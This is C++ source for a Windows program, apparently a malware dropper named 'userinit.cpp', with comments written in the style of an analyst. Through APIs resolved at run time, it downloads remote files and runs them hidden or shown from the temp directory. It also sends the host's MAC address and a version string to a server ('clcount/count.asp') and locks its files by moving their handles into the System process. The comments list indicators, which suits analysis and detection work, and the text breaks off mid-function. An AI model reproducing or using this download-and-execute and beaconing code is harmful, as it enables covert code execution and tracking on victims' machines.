// userinit.cpp : Defines the entry point for the application.
//
//#include "stdafx.h"
#include <windows.h>
//#include "resource.h"
#include "iphlpapi.h"
//#include "stdio.h"
#include <urlmon.h>
#include <shlwapi.h>
#pragma comment(linker, "/ALIGN:0x1000 /entry:main /MERGE:.text=.rdata")
#include <Wininet.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"shlwapi.lib")
// Function-pointer types matching URLDownloadToFileA (urlmon.dll) and InternetOpenA /
// InternetOpenUrlA / InternetCloseHandle (wininet.dll). The program resolves these with
// GetProcAddress at run time (see DownloadFile and RePortState) rather than linking them,
// so the API names are present only as string literals, not in the import table.
// `_stdcall` (single underscore) is an MSVC-accepted alias of __stdcall.
typedef HRESULT (_stdcall *XXXURLDownloadToFile)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINTERNET (_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET (_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
typedef BOOL (_stdcall *XXXInternetCloseHandle)(HINTERNET);
// Enables SeDebugPrivilege on the current process token. OccupyFile calls this
// immediately before opening PID 4 / PID 8 with PROCESS_DUP_HANDLE.
// The outcome is never reported: the function is void, the AdjustTokenPrivileges
// result is stored in bREt and ignored, and the "privilege not held" case is only
// signalled by GetLastError() == ERROR_NOT_ALL_ASSIGNED, which is never queried.
// For an account that does not hold SeDebugPrivilege this therefore fails silently
// and the caller proceeds anyway.
void RaiseToDebugP()
{
    HANDLE hToken;
    HANDLE hProcess = GetCurrentProcess();
    if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
    {
        TOKEN_PRIVILEGES tkp;
        if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
        {
            tkp.PrivilegeCount = 1;
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            // Result is unused (see header comment).
            BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;
        }
        CloseHandle(hToken);
    }
}
// Creates lpFileName (CREATE_ALWAYS, so an existing file is truncated) with share mode 0
// and then moves the open handle into another process with DUPLICATE_CLOSE_SOURCE. The
// target is PID 4, falling back to PID 8 — presumably the System process on XP+ and on
// Windows 2000 respectively (inferred from the constants, not stated in the code). Once the
// handle lives there it is never closed by this program, so the file remains exclusively
// locked and cannot be deleted or overwritten by other processes while that handle exists.
// This is a file-locking technique; the observable artefact for a defender is an open handle
// to this path held by the System process rather than by the process that created the file.
// Returns FALSE if neither process could be opened or the file could not be created,
// otherwise the DuplicateHandle result. Per the DuplicateHandle contract the source handle
// is closed by DUPLICATE_CLOSE_SOURCE even when the call fails, so hFile is not leaked.
BOOL OccupyFile( LPCTSTR lpFileName )
{
    BOOL bRet;
    RaiseToDebugP();
    HANDLE hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 4);
    if ( hProcess == NULL )
    {
        hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 8);
        if ( hProcess == NULL )
            return FALSE;
    }
    HANDLE hFile;
    HANDLE hTargetHandle;
    // Share mode 0: no other open of this file succeeds while the handle is alive.
    hFile = CreateFile( lpFileName, GENERIC_READ, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL);
    if ( hFile == INVALID_HANDLE_VALUE )
    {
        CloseHandle( hProcess );
        return FALSE;
    }
    // hTargetHandle is a handle value in the *target* process; it is intentionally never closed.
    bRet = DuplicateHandle( GetCurrentProcess(), hFile, hProcess, &hTargetHandle,
        0, FALSE, DUPLICATE_SAME_ACCESS|DUPLICATE_CLOSE_SOURCE);
    CloseHandle( hProcess );
    return bRet;
}
// Maps the whole of lpFilePath into memory and returns the view base, or NULL on any
// failure. bReadOnly selects read-only (GENERIC_READ / PAGE_READONLY / FILE_MAP_READ)
// versus read-write access. If lpdwFileSize is non-NULL it receives GetFileSize's low
// DWORD; the high DWORD is discarded and INVALID_FILE_SIZE is not checked, so the
// reported size is only meaningful for files under 4 GiB.
// The file and mapping-object handles are closed before returning; the view keeps the
// mapping alive, and the caller releases it with UnmapFile().
LPVOID MapFile(LPCTSTR lpFilePath, LPDWORD lpdwFileSize, BOOL bReadOnly)
{
    // [0] desired access for CreateFile, [1] page protection, [2] view access.
    DWORD dwAccess[3];
    if ( bReadOnly )
    {
        dwAccess[0] = GENERIC_READ;
        dwAccess[1] = PAGE_READONLY;
        dwAccess[2] = FILE_MAP_READ;
    }
    else
    {
        dwAccess[0] = (GENERIC_WRITE | GENERIC_READ);
        dwAccess[1] = PAGE_READWRITE;
        dwAccess[2] = (FILE_MAP_READ | FILE_MAP_WRITE);
    }
    HANDLE hFile = CreateFile(lpFilePath, dwAccess[0], FILE_SHARE_READ,
        NULL, OPEN_EXISTING, 0, NULL);
    if ( hFile != INVALID_HANDLE_VALUE )
    {
        if ( lpdwFileSize != NULL )
        {
            *lpdwFileSize = GetFileSize(hFile, NULL);
        }
        // Size 0/0 maps the entire file.
        HANDLE hFileMap = CreateFileMapping(hFile, NULL, dwAccess[1], 0, 0, NULL);
        CloseHandle(hFile);
        if ( hFileMap != NULL )
        {
            LPVOID lpFileData = MapViewOfFile(hFileMap, dwAccess[2], 0, 0, 0);
            CloseHandle(hFileMap);
            return lpFileData;
        }
    }
    return NULL;
}
// Releases a view returned by MapFile(). NULL is accepted and ignored.
void UnmapFile(LPVOID lpFileData)
{
    if ( lpFileData != NULL )
    {
        UnmapViewOfFile(lpFileData);
    }
}
// Locates the overlay (bytes appended after the last section's raw data) of the PE image
// in lpBuffer (dwSize bytes). Returns a pointer to the overlay, or NULL if the DOS or NT
// signature does not match. If poutSize is non-NULL it receives dwSize minus the offset
// at which the last section ends.
// No bounds checking is done: e_lfanew, NumberOfSections, PointerToRawData and
// SizeOfRawData are trusted as-is. A truncated or malformed image therefore reads
// outside lpBuffer, returns a pointer past the end of the buffer, or — when the last
// section ends beyond dwSize — wraps *poutSize to a huge DWORD. NumberOfSections == 0
// steps SectHeader backwards to before the first section header.
// The (DWORD) pointer casts assume a 32-bit build.
LPVOID GetOverlayOffset(PVOID lpBuffer, DWORD dwSize, LPDWORD poutSize)
{
    PIMAGE_DOS_HEADER DosHeader;
    PIMAGE_NT_HEADERS NtHeader;
    PIMAGE_SECTION_HEADER SectHeader;
    DosHeader = (PIMAGE_DOS_HEADER)lpBuffer;
    if ( DosHeader->e_magic != IMAGE_DOS_SIGNATURE )
        return NULL;
    // e_lfanew is not validated against dwSize before being dereferenced.
    NtHeader = (PIMAGE_NT_HEADERS)( DosHeader->e_lfanew + (DWORD)DosHeader );
    if ( NtHeader->Signature != IMAGE_NT_SIGNATURE )
        return NULL;
    DWORD overlay = NULL;
    // Advance to the last section header; the overlay starts where its raw data ends.
    SectHeader = IMAGE_FIRST_SECTION(NtHeader);
    SectHeader += (NtHeader->FileHeader.NumberOfSections-1);
    overlay = SectHeader->PointerToRawData + SectHeader->SizeOfRawData + (DWORD)lpBuffer;
    if ( poutSize != NULL )
    {
        *poutSize = dwSize - (overlay -(DWORD)lpBuffer);
    }
    return (PVOID)overlay;
}
//
// Run a program
//
// Launches szFileName via WinExec, with the window shown (SW_SHOW) or hidden (SW_HIDE)
// according to bShow.
// si and pi are initialised but never used (leftovers from a CreateProcess variant, judging
// by the commented-out lines), WinExec's return value is discarded, and bRet is never
// assigned after its initialiser, so the function always returns FALSE whether or not
// the launch succeeded. Callers (DownloadFile) ignore the return value.
BOOL RunProcess(LPCTSTR szFileName, BOOL bShow)
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    BOOL bRet = FALSE;
    si.cb = sizeof(si);
    if ( bShow )
    {
        // si.wShowWindow = SW_SHOW;
        // si.dwFlags |= STARTF_USESHOWWINDOW;
        WinExec( szFileName, SW_SHOW);
    }
    else
        WinExec( szFileName, SW_HIDE);
    return bRet;
}
// Downloads lpszUrl with URLDownloadToFileA (resolved from urlmon.dll at run time) and
// acts on the extension found after the last '.' in the URL string:
//   - "ini" / "txt" (case-insensitive): treated as a configuration file and saved as
//     <system directory>\down.txt, retrying up to 10 times one second apart; nothing is run.
//   - anything else: saved under the temp directory with a GetTempFileName "sv" prefix and
//     iProcessNameNumber as the unique number, retrying up to 5 times, then launched via
//     RunProcess(szTempExe, TRUE).
// Returns silently if the URL has no '.', urlmon cannot be resolved, or all retries fail.
// Notes visible in the code:
//   - strrchr runs over the whole URL, so a '.' in a query string or fragment decides the
//     branch, not the path's extension.
//   - `index` is read after each for loop ends; that relies on the pre-standard MSVC rule
//     that a for-init variable leaks into the enclosing scope. Conforming compilers reject it.
//   - strcat onto the GetSystemDirectory result has no length check against MAX_PATH.
//   - Per the GetTempFileName contract a nonzero unique number only builds the name and does
//     not create the file — whether iProcessNameNumber is ever 0 cannot be seen from here.
//   - The LoadLibrary("urlmon.dll") handle is never released.
// The two drop locations (<system dir>\down.txt and <temp>\sv*.tmp) and the
// "URLDownloadToFileA" string are the observable indicators of this routine.
void DownloadFile(LPCTSTR lpszUrl, int iProcessNameNumber)
{
    BOOL bIsIni = FALSE;
    LPTSTR lpPostFix = strrchr(lpszUrl, '.');
    if ( lpPostFix == NULL )
        return;
    lpPostFix++;
    XXXURLDownloadToFile kkkkkk;
    HRESULT hRes ;
    TCHAR szTempDir[MAX_PATH];
    TCHAR szTempExe[MAX_PATH];
    kkkkkk = (XXXURLDownloadToFile)GetProcAddress( LoadLibrary("urlmon.dll"), "URLDownloadToFileA");
    if ( kkkkkk == NULL )
        return;
    if ( stricmp(lpPostFix, "ini") == 0 || stricmp(lpPostFix, "txt") == 0 )
    {
        bIsIni = TRUE;
    }
    if (bIsIni)
    {
        // Configuration file: download it and save it as down.txt in the system directory.
        GetSystemDirectory(szTempDir, MAX_PATH);
        strcat(szTempDir, "\\down.txt");
        strcpy(szTempExe, szTempDir);
        // Retry up to 10 times, one second apart (the original comment said 300; the code loops 10).
        for ( DWORD index = 0; index < 10; index++)
        {
            hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
            if ( hRes == S_OK )
            {
                break;
            }
            Sleep(1000);
        }
        // `index` here is the loop variable leaking out of the for scope (old MSVC behaviour).
        if ( index == 10 )
        {
            return;
        }
    }
    else
    {
        GetTempPath(MAX_PATH, szTempDir);
        GetTempFileName( szTempDir, "sv", iProcessNameNumber, szTempExe);
        // Retry up to 5 times, one second apart (the original comment said 10; the code loops 5).
        for ( DWORD index = 0; index < 5; index++)
        {
            hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
            if ( hRes == S_OK )
            {
                break;
            }
            Sleep(1000);
        }
        // Same out-of-scope use of `index` as above.
        if ( index == 5)
        {
            return;
        }
    }
    // Only non-configuration downloads are executed.
    if ( !bIsIni )
    {
        RunProcess(szTempExe, TRUE);
        return;
    }
}
//
// Send the local host's information to the server, including: MAC address, anti-virus product name, OS version number, IE version number
//
// Reports the host to the server by opening the URL
//   <szDomain>clcount/count.asp?mac=<szMac>&ver=<Version>
// with user agent "GOOGLE" and INTERNET_FLAG_RELOAD, through wininet functions resolved
// by name at run time. Returns TRUE as soon as InternetOpenUrl succeeds; the response is
// never read. Despite the header comment, only the mac and ver values are sent.
// Caveats visible in the code:
//   - szSendBuf is MAX_PATH bytes and is filled with unchecked strcpy/strcat, so overlong
//     szDomain, szMac or Version overflow this stack buffer.
//   - On the success path neither hropenurl nor hropen is closed; each call leaks both.
//   - INTERNET_INVALID_PORT_NUMBER is passed where InternetOpenA expects lpszProxyBypass;
//     wininet.h defines it as 0, so it behaves as NULL, but the argument is mistyped.
//   - The three LoadLibrary("wininet.dll") handles are never released.
// The fixed user agent string and the "clcount/count.asp?mac=" path are the network
// indicators of this beacon.
BOOL RePortState(char *szDomain, char *Version, char *szMac)
{
    XXXInternetOpen tempInternetOpen;
    XXXInternetOpenUrl tempInternetOpenUrl;
    XXXInternetCloseHandle tempInternetCloseHandle;
    // Resolved dynamically; none of the three pointers is checked for NULL before use.
    tempInternetOpen = (XXXInternetOpen)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenA");
    tempInternetOpenUrl = (XXXInternetOpenUrl)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenUrlA");
    tempInternetCloseHandle = (XXXInternetCloseHandle)GetProcAddress( LoadLibrary("wininet.dll"), "InternetCloseHandle");
    HINTERNET hropen=NULL;
    HINTERNET hropenurl=NULL;
    hropen=tempInternetOpen("GOOGLE",
        PRE_CONFIG_INTERNET_ACCESS,
        NULL,
        INTERNET_INVALID_PORT_NUMBER,
        0);
    if(hropen==NULL)
    {
        return FALSE;
    }
    char szSendBuf[MAX_PATH] = {0};
    char szFirstPartBuf[] = "clcount/count.asp?mac=";
    char szSendPartBuf[] = "&ver=";
    // Build the request URL (no length checks against sizeof szSendBuf).
    strcpy(szSendBuf, szDomain);
    strcat(szSendBuf, szFirstPartBuf);
    strcat(szSendBuf, szMac);
    strcat(szSendBuf, szSendPartBuf);
    strcat(szSendBuf, Version);
    hropenurl = tempInternetOpenUrl(hropen,
        szSendBuf,
        NULL,
        0,
        INTERNET_FLAG_RELOAD,
        0);
    if(hropenurl==NULL)
    {
        // hropen is non-NULL here (checked above), so the inner test is redundant.
        if(hropen)
        {
            tempInternetCloseHandle(hropen);
            hropen=NULL;
        }
        return FALSE;
    }
    // Success: both handles are left open.
    return TRUE;
}
//
// Check whether the specified marker exists
//
BOOL FindMarks(char *szIniFilePath, char *szInMark)
{
int iRenturnValue = 0;
char szGettedStr[10] = {0};
int icount = 0;
GetPrivateProfileString("localfile", "count","0",szGettedStr,sizeof(szGettedStr), szIniFilePath);